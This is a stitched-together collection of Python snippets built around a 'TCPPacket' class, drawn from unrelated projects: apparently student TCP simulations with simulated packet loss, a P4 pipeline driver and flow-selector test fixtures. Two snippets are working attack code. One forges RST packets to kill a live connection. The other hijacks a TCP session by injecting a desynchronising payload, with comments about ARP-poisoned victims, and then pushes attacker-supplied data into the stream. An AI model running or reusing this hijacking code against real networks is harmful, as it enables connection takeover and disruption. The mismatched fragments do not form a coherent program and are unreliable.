def sendNextPacket(self, eventQueue, t): """Sends the next packet in the message.""" nBytes = min(MAX_PACKET_DATA, len(self.msgBytes) - self.seq) data = self.msgBytes[self.seq:self.seq + nBytes] p = TCPPacket(seq=self.seq, ack=self.ack, ACK=True, data=data) if self.seq + nBytes == len(self.msgBytes): p.FIN = True #adding the checksum to the packet p.checksum = (checksum16(p.toBytes()) ^ 0xFFFF ) #adds event for server to receive this packet e = ReceivePacketEvent(self.server, p) #there's a chance that the packet will be lost: if(random.random()>LOST_PACKET_PROBABILITY): eventQueue.enqueue(e, t + TRANSMISSION_DELAY) if p.FIN: # if this is the last packet, it will start over. self.queueRequestMessage(eventQueue, t + ROUND_TRIP_TIME) #remember to add a timeout event #toe = TimeoutEvent(self.server, p) toe = TimeoutEvent(self, p) eventQueue.enqueue(toe, t + 2*TRANSMISSION_DELAY)
def reset_stream(self, handle): print("Waiting for ACK packet to reset the stream..") while 1: packet = handle.next() flags = packet.tcp_get_flags() if (flags["ack"] and not flags["syn"] and not len(packet.tcp_payload)): args = { "mac_src" : tuple([int(i, 16) for i in packet.ethernet_dst.split(":")]), "mac_dst" : tuple([int(i, 16) for i in packet.ethernet_src.split(":")]), "ip_source" : packet.ip_dest, "ip_dest" : packet.ip_source, "tcp_src" : packet.tcp_dst, "tcp_dst" : packet.tcp_src, "tcp_seq" : packet.tcp_seq_ack, } pkt = TCPPacket(args) pkt.tcp_set_flags(rst = 1) pkt.calc_len() pkt.calc_csum() for i in range(5): pkt.sendto(pkt.to_bytes(), (self.dev, 0)) print("Stream has been reseted.") break
def sendNextPacket(self, eventQueue, t): """Sends the next packet in the message.""" nBytes = min(MAX_PACKET_DATA, len(self.msgBytes) - self.seq) data = self.msgBytes[self.seq:self.seq + nBytes] p = TCPPacket(seq=self.seq, ack=self.ack, ACK=True, data=data) if self.seq + nBytes == len(self.msgBytes): p.FIN = True e = ReceivePacketEvent(self.server, p) if random.randint(0, 1) >= LOST_PACKET_PROBABILITY: eventQueue.enqueue(e, t + TRANSMISSION_DELAY) if p.FIN: self.queueRequestMessage(eventQueue, t + TIMEOUT)
def sendXPackets(self,eventQueue,t,x): #creates the packets packets = [] for i in range(x): nBytes = min(MAX_PACKET_DATA, len(self.msgBytes) - self.seq) data = self.msgBytes[self.seq:self.seq + nBytes] p = TCPPacket(seq=self.seq,ack=self.ack,ACK =True, data=data) # no reason to have ack here? #adding the checksum to the packet p.checksum = (checksum16(p.toBytes()) ^ 0xFFFF ) packets.append(p) # if self.seq extends the amount of data in msgBytes, there're # no more packets to make if self.seq + (len(p.data))>= len(self.msgBytes): #this will be the last packet if DEBUG: print('all the packets are sent!') p.FIN = True #at this point, also need to recalculate the checksum p.checksum = 0x0000 p.checksum = (checksum16(p.toBytes()) ^ 0xFFFF ) break #add to sequence self.seq += nBytes #now to send all the packets! for p in packets: e = ReceivePacketEvent(self.server, p) #there's a chance that the packet WON'T be lost: if(random.random()>LOST_PACKET_PROBABILITY): if DEBUG: print("packet %r isn't lost"% p.data) eventQueue.enqueue(e, t + TRANSMISSION_DELAY) #I'm moving this to when the serverreceives the last message #if p.FIN: #self.queueRequestMessage(eventQueue, 66 +t + ROUND_TRIP_TIME) else: #if lost #if DEBUG: print("packet %r is LOST!!!"% p.data) #remember to add a timeout event toe = TimeoutEvent(self.server, p) eventQueue.enqueue(toe, t + 2*TRANSMISSION_DELAY) t+=1 if DEBUG: print("all packets in this batch are sent") print("here's the event queue:",str(eventQueue))
def sendNextPacket(self, eventQueue, t): """Sends the next packet in the message.""" nBytes = min(MAX_PACKET_DATA, len(self.msgBytes) - self.seq) data = self.msgBytes[self.seq:self.seq + nBytes] p = TCPPacket(seq=self.seq, ack=self.ack, ACK=True, data=data) if self.seq + nBytes == len(self.msgBytes): p.FIN = True self.awaitingAck[checksum16(p.toBytes())] = p if keepPacketBool(): e = ReceivePacketEvent(self.server, p) eventQueue.enqueue(e, t + TRANSMISSION_DELAY) self.queueTimeoutMessage(p,eventQueue,t) if p.FIN: self.queueRequestMessage(eventQueue, t + TIMEOUT)
def receivePacket(self, p, eventQueue, t): """ Handles packets sent from the server and sends an acknowledgment back in return. This version assumes that the sequence numbers appear in the correct order. """ ## ## THIS JUST SENDS THE ACK!! ## #self.msgBytes.extend(p.data) if p.seq == self.seq: self.seq+= len(p.data) self.msgBytes.extend(p.data) #there used to be something here that kept track of received packets # so that client didn't need to resend EVERYTHING, but I didn't implement # it well so I deleted it. self.ack = self.seq if DEBUG: print("server received %r and its seq/ack is now %r" % (p.data,self.ack)) reply = TCPPacket(seq=self.seq, ack=self.ack, ACK=True) if p.FIN and self.ack >= p.seq: #I should also check here to make sure last complete set is here reply.FIN = True print("Server receives \"" + self.msgBytes.decode("UTF-8") + "\"") if DEBUG: print("Cool I got all the packets! ") self.resetForNextMessage() eventQueue.clear() self.client.queueRequestMessage(eventQueue, t + ROUND_TRIP_TIME) #adding the checksum to the packet reply.checksum = (checksum16(reply.toBytes()) ^ 0xFFFF ) # here is where we should send the ack e = ReceivePacketEvent(self.client, reply) eventQueue.enqueue(e, t + TRANSMISSION_DELAY)
def receivePacket(self, p, eventQueue, t): """ Handles packets sent from the server and sends an acknowledgment back in return. This version assumes that the sequence numbers appear in the correct order. """ self.msgBytes.extend(p.data) self.seq = p.ack self.ack = p.seq + len(p.data) reply = TCPPacket(seq=self.seq, ack=self.ack, ACK=True, checksum = ~checksum16(p.toBytes())) if p.FIN: reply.FIN = True print("Server receives \"" + self.msgBytes.decode("UTF-8") + "\"") self.resetForNextMessage() e = ReceivePacketEvent(self.client, reply) eventQueue.enqueue(e, t + TRANSMISSION_DELAY)
def processRecv(self, expecting_packet): channel = self.get_channel() if not channel or channel.isCondemn(): return False packet = TCPPacket() length = packet.recvFromEndPoint(self._endpoint) if length < 0: self.onGetError(channel) return False elif length == 0: return False if not self.processPacket(channel, packet): print "processRecv failed" return True
def receivePacket(self, p, eventQueue, t): """ Handles packets sent from the server and sends an acknowledgment back in return. This version assumes that the sequence numbers appear in the correct order. """ def checkAllReceived(): # Sorts self.recieved self.received.sort() correctAck = MAX_PACKET_DATA # Check if packets are missing for ack, _ in self.received: if ack > correctAck: return False correctAck += MAX_PACKET_DATA return True self.seq = p.ack self.ack = p.seq + len(p.data) if (self.ack, p.data) not in self.received: self.received.append((self.ack, p.data)) if p.FIN: self.receivedFIN = True reply = TCPPacket(seq=self.seq, ack=self.ack, ACK=True, checksum=~checksum16(p.toBytes()), window=RECIEVE_WINDOW) #If all packets are present, message complete. if self.receivedFIN and checkAllReceived(): self.received.sort() for _, data in self.received: self.msgBytes.extend(data) reply.FIN = True e = ReceivePacketEvent(self.client, reply) eventQueue.enqueue(e, t + TRANSMISSION_DELAY) print("Server receives \"" + self.msgBytes.decode("UTF-8") + "\"") self.resetForNextMessage() else: if random.random() > LOST_PACKET_PROBABILITY: e = ReceivePacketEvent(self.client, reply) eventQueue.enqueue(e, t + TRANSMISSION_DELAY)
def sendNextPacket(self, eventQueue, t): """Sends the next packet in the message.""" nBytes = min(MAX_PACKET_DATA, len(self.msgBytes) - self.seq) data = self.msgBytes[self.seq:self.seq + nBytes] p = TCPPacket(seq=self.seq, ack=self.ack, ACK=True, data=data) if self.seq + nBytes == len(self.msgBytes): p.FIN = True e = ReceivePacketEvent(self.server, p) #With some probability, lose the packet if random.random() > LOST_PACKET_PROBABILITY: eventQueue.enqueue(e, t + TRANSMISSION_DELAY) #Queue the timeout event timeout = TimeoutEvent(self, p) self.waitingForAck[checksum16(p.toBytes())] = p eventQueue.enqueue(timeout, t + 4 * TRANSMISSION_DELAY) self.seq += nBytes self.ack = self.seq + 1 #If we aren't finished and serverRecieveWindow allows it, send next bytes if not p.FIN and len(self.waitingForAck) < self.serverRecieveWindow: self.sendNextPacket(eventQueue, t)
rnode = self.rtree.add(prefix) rnode.data['id'] = int(metadata[0]) def process_packet(self, packet): rnode = self.rtree.search_best(packet.dst_ip) if rnode is not None: for k, v in rnode.data.items(): packet.metadata[k] = v return True else: return False if __name__ == '__main__': from packet import TCPPacket fwtable = FWTable('log', 20, 'fr_fwtable.log') fwtable.add_fw_rule('2.2.2.0/24', {'meta1': 1, 'meta2': 'salut'}) p1 = TCPPacket(1, '1.1.1.1', '2.2.2.2', 1, 2, 3, 10, 10, 10, False, False) p2 = TCPPacket(1, '1.1.1.1', '2.2.3.2', 1, 2, 3, 10, 10, 10, False, False) fwtable.process_packet(p1) print p1 fwtable.process_packet(p2) print p2
def control_stream_o(self, handle): print("Waiting for ACK packet to inject payload..") while 1: packet = handle.next() flags = packet.tcp_get_flags() if (flags["ack"] and not flags["syn"] and not len(packet.tcp_payload)): ''' We only hijack the session on an ACK packet without a payload. This is because it becomes a race condition of responding to a payload packet between the attacker and the target host. The chance of this is large being connected to a HUB, large if targetting yourself, and low if the target is ARP poisoned. The packet below will screw up the stream at both sides, after that you can send data freely. ''' args = { "mac_src" : tuple([int(i, 16) for i in packet.ethernet_dst.split(":")]), "mac_dst" : tuple([int(i, 16) for i in packet.ethernet_src.split(":")]), "ip_source" : packet.ip_dest, "ip_dest" : packet.ip_source, "tcp_src" : packet.tcp_dst, "tcp_dst" : packet.tcp_src, "tcp_seq" : packet.tcp_seq_ack, "tcp_seq_ack" : packet.tcp_seq, "payload" : b"\x41" * 40 } pkt = TCPPacket(args) pkt.tcp_set_flags(push = 1, ack = 1) pkt.calc_len() pkt.calc_csum() pkt.sendto(pkt.to_bytes(), (self.dev, 0)) break print("Payload injected. Targets kernel is now -40 SEQ on transmission.") # Save a the SEQ and ACK numbers self.tcp_seq = packet.tcp_seq_ack + 40 self.tcp_ack = packet.tcp_seq # Create a lock object lock = threading.Lock() # Start the input stream handler tid = threading.Thread(target = self.control_stream_i, args = (handle, lock)) tid.start() if (self.input_method == 1): while 1: pkt.tcp_seq = self.tcp_seq pkt.tcp_payload = input("TCPHijack: ").encode("utf-8") lock.acquire() pkt.tcp_seq_ack = self.tcp_ack pkt.calc_len() pkt.calc_csum() pkt.sendto(pkt.to_bytes(), (self.dev, 0)) lock.release() self.tcp_seq += len(pkt.tcp_payload) else: with open(self.file, "rt") as f: for line in f: pkt.tcp_seq = self.tcp_seq lock.acquire() pkt.tcp_seq_ack = self.tcp_ack pkt.tcp_payload = line.encode("utf-8") pkt.calc_len() pkt.calc_csum() pkt.sendto(pkt.to_bytes(), (self.dev, 0)) lock.release() self.tcp_seq += len(pkt.tcp_payload) time.sleep(1)
def control_stream_i(self, handle, lock): pkt = TCPPacket() while 1: packet = handle.next() if (not len(packet.tcp_payload)): continue lock.acquire() self.tcp_ack += len(packet.tcp_payload) pkt.ethernet_src = tuple([int(i, 16) for i in packet.ethernet_dst.split(":")]) pkt.ethernet_dst = tuple([int(i, 16) for i in packet.ethernet_src.split(":")]) pkt.ip_source = packet.ip_dest pkt.ip_dest = packet.ip_source pkt.tcp_src = packet.tcp_dst pkt.tcp_dst = packet.tcp_src pkt.tcp_seq = self.tcp_seq pkt.tcp_seq_ack = self.tcp_ack pkt.tcp_set_flags(ack = 1) pkt.calc_len() pkt.calc_csum() pkt.sendto(pkt.to_bytes(), (self.dev, 0)) lock.release()
seq = int(linetab[3]) src_port = int(linetab[4]) dst_port = int(linetab[5]) ip_len = int(linetab[6]) ip_hdr_len = int(linetab[7]) tcp_hdr_len = int(linetab[8]) tcp_flag = int(linetab[9], 16) syn_flag = ( tcp_flag & dpkt.tcp.TH_SYN ) != 0 fin_flag = ( tcp_flag & dpkt.tcp.TH_FIN ) != 0 ret = True if linetab[10] == '1' else False except ValueError: print line continue # Create the packet object packet = TCPPacket(ts, src_ip, dst_ip, seq, src_port, dst_port, ip_len, \ ip_hdr_len, tcp_hdr_len, syn_flag, fin_flag, ret=ret) if packet is not None and pkt_offset <= 0: # Send that packet through the p4 pipeline p4pipeline.process_packet(packet) pkt_offset -= 1 # Read pcap from a pcap file else: for packet in parse_pcap.pcap_reader(pcap_file): if packet is not None and pkt_offset <= 0: p4pipeline.process_packet(packet) pkt_offset -= 1 p4pipeline.close()
registers['flowselector_key'] = [0] * 10 registers['flowselector_ts'] = [0] * 10 registers['flowselector_nep'] = [0] * 10 registers['flowselector_5tuple'] = [''] * 10 registers['flowselector_last_ret'] = [0] * 10 registers['sw'] = [] for _ in xrange(0, 10): registers['sw'] += [0] * 10 registers['sw_index'] = [0] * 10 registers['sw_time'] = [0] * 10 registers['sw_sum'] = [0] * 10 hfs = FlowSelector('log', 25, registers, 32, 2, 2, seed=10) p1 = TCPPacket(1, '1.1.1.1', '2.2.2.2', 1, 2, 3, 21, 10, 10, False, False) p1.metadata['id'] = 0 p2 = TCPPacket(1.1, '1.1.1.1', '2.2.2.2', 1, 2, 3, 21, 10, 10, False, False) p2.metadata['id'] = 0 p3 = TCPPacket(1.2, '1.1.1.1', '2.2.2.3', 1, 2, 3, 21, 10, 10, False, False) p3.metadata['id'] = 0 p4 = TCPPacket(1.3, '1.1.1.1', '2.2.2.3', 2, 2, 3, 21, 10, 10, False, False) p4.metadata['id'] = 0 p5 = TCPPacket(1.4, '1.1.1.1', '2.2.2.3', 2, 2, 3, 21, 10, 10, False, False) p5.metadata['id'] = 0 p6 = TCPPacket(1.7, '1.1.1.1', '2.2.2.4', 2, 2, 3, 21, 10, 10, False, False) p6.metadata['id'] = 0 p7 = TCPPacket(1.8, '1.1.1.1', '2.2.2.4', 3, 2, 3, 21, 10, 10, False, False) p7.metadata['id'] = 0